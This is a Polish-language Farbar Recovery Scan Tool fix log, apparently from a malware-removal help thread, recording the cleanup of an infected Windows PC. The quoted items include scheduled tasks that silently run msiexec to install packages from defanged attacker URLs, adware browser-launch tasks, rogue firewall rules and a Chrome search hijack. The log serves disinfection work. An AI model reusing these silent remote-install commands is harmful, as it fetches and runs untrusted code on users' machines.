Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 20.06.2018
Uruchomiony przez Ryuuku (23-09-2018 13:20:25) Run:1
Uruchomiony z D:\Ryuuku\Downloads
Załadowane profile: Ryuuku (Dostępne profile: Ryuuku)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
Task: {031C5E90-2DC1-47A9-B18A-BA62A50B5D1B} - System32\Tasks\{84BA2884-E7CC-76DF-A609-4099971479D6} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.iul
Task: {031E08D8-BBB6-45D7-8E79-EE276F67F075} - System32\Tasks\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740} => "msiexec" /q -i hxxp://zevariurs.com/ep1hcnmxg1wu.ieo
Task: {636AD5F0-226D-497A-AC4F-779BC299C81E} - System32\Tasks\{64D37BF8-BBEA-A456-51C9-A118801C0D0E} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt
Task: {7479A460-5893-42C3-95D1-A4803628BA6C} - System32\Tasks\{605AE53A-C188-3376-5E0D-68183401157D} => "msiexec" /q -i hxxp://zevariurs.com/lyyxybwnoxtt.lvt
Task: {978D2965-E1DF-4723-B56F-2914D3658228} - System32\Tasks\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=lx6bs30puezteu1uy7b32g0vgs8thjot&prid=1&pid=4_1324_0
Task: {F937031D-C751-4AEA-9ECA-5238451313C4} - System32\Tasks\{159EF659-4241-B5C4-8CF9-46DF34FA3D62} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://bl0ging.com/cl/?guid=g6p9m608jw5e8plsv5eho4mf4k3ufmql&prid=1&pid=4_1324_0
FirewallRules: [{A2AB0068-96F5-4E9E-B6BF-69E7EEA41084}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{85D688A7-D708-407C-BC57-CF3CEC0440E0}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe
FirewallRules: [{3F976A86-0171-436F-9DE2-5ACC1B217144}] => (Allow) C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe
FirewallRules: [{58B801B8-14EF-4366-9F67-B6A21A53BEB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F40DD2A8-508F-46D4-AD25-605339207A84}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{EF5040F2-911D-413D-96D4-F2966DE5B32D}] => (Allow) C:\Program Files (x86)\CseOVOAOo.exe
FirewallRules: [{8E0A82BB-0383-4642-A126-3D0C18C464D4}] => (Allow) C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe
FirewallRules: [{542EEA5B-B888-4282-B07F-0D1C4DD50B47}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1D9F26D1-2CB4-4BE1-9788-20540CABB336}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B1CFE105-C6DE-4F0C-A1A5-A03483977BC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D685430B-3DE0-4E4A-8204-3820B9E6B077}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{31612011-A91C-4D31-B04C-E23DD2C4F7AC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9E76281B-5526-4A25-8ED8-AE3A534EC8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E41056A0-A47B-411A-A371-F9F220D3F058}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{25AFC395-C9D7-40BC-A156-BF5DF738080C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
C:\Program Files (x86)\CseOVOAOo.exe
C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe
C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe
C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe
C:\Users\Ryuuku\AppData\Local\yGOYOHOXbaAnc.exe
CHR DefaultSearchURL: Default -> data:image/png;base64,[...]
CHR HKLM-x32\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx
C:\Users\Ryuuku\AppData\Local\imw.ini
EmptyTemp:
*****************

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{031C5E90-2DC1-47A9-B18A-BA62A50B5D1B}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{031C5E90-2DC1-47A9-B18A-BA62A50B5D1B}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{84BA2884-E7CC-76DF-A609-4099971479D6} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{84BA2884-E7CC-76DF-A609-4099971479D6}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{031E08D8-BBB6-45D7-8E79-EE276F67F075}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{031E08D8-BBB6-45D7-8E79-EE276F67F075}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DF9AEE5D-429B-E559-BE4E-426FE6DB5740}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{636AD5F0-226D-497A-AC4F-779BC299C81E}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{636AD5F0-226D-497A-AC4F-779BC299C81E}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{64D37BF8-BBEA-A456-51C9-A118801C0D0E} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{64D37BF8-BBEA-A456-51C9-A118801C0D0E}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7479A460-5893-42C3-95D1-A4803628BA6C}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7479A460-5893-42C3-95D1-A4803628BA6C}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{605AE53A-C188-3376-5E0D-68183401157D} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{605AE53A-C188-3376-5E0D-68183401157D}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{978D2965-E1DF-4723-B56F-2914D3658228}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{978D2965-E1DF-4723-B56F-2914D3658228}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9F5410CB-B3EF-66B1-87B5-E7D9AEF5AC4A}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F937031D-C751-4AEA-9ECA-5238451313C4}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F937031D-C751-4AEA-9ECA-5238451313C4}" => pomyślnie usunięto
C:\Windows\System32\Tasks\{159EF659-4241-B5C4-8CF9-46DF34FA3D62} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{159EF659-4241-B5C4-8CF9-46DF34FA3D62}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A2AB0068-96F5-4E9E-B6BF-69E7EEA41084}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{85D688A7-D708-407C-BC57-CF3CEC0440E0}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3F976A86-0171-436F-9DE2-5ACC1B217144}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{58B801B8-14EF-4366-9F67-B6A21A53BEB3}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F40DD2A8-508F-46D4-AD25-605339207A84}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EF5040F2-911D-413D-96D4-F2966DE5B32D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8E0A82BB-0383-4642-A126-3D0C18C464D4}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{542EEA5B-B888-4282-B07F-0D1C4DD50B47}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1D9F26D1-2CB4-4BE1-9788-20540CABB336}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B1CFE105-C6DE-4F0C-A1A5-A03483977BC9}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D685430B-3DE0-4E4A-8204-3820B9E6B077}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{31612011-A91C-4D31-B04C-E23DD2C4F7AC}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9E76281B-5526-4A25-8ED8-AE3A534EC8AB}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E41056A0-A47B-411A-A371-F9F220D3F058}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{25AFC395-C9D7-40BC-A156-BF5DF738080C}" => pomyślnie usunięto
C:\Program Files (x86)\CseOVOAOo.exe => pomyślnie przeniesiono
C:\Users\Ryuuku\AppData\Roaming\hjlGaZAEIKOy.exe => pomyślnie przeniesiono
C:\Users\Ryuuku\AppData\Local\YnRepIdE.exe => pomyślnie przeniesiono
C:\Users\Ryuuku\AppData\Roaming\AINAOOuOgklgb.exe => pomyślnie przeniesiono
C:\Users\Ryuuku\AppData\Local\yGOYOHOXbaAnc.exe => pomyślnie przeniesiono
"Chrome DefaultSearchURL" => pomyślnie usunięto
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nladljmabboanhihfkjacnnkgjhnokhj" => pomyślnie usunięto
C:\Users\Ryuuku\AppData\Local\imw.ini => pomyślnie przeniesiono

=========== EmptyTemp: ==========

BITS transfer queue => 6578176 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36303008 B
Java, Flash, Steam htmlcache => 54733716 B
Windows/system/drivers => 2600994 B
Edge => 108442926 B
Chrome => 766274589 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 5022 B
NetworkService => 1426 B
Ryuuku => 140902616 B

RecycleBin => 38316 B
EmptyTemp: => 1 GB danych tymczasowych Usunięto.

================================

System wymagał restartu.

==== Koniec Fixlog 13:20:33 ====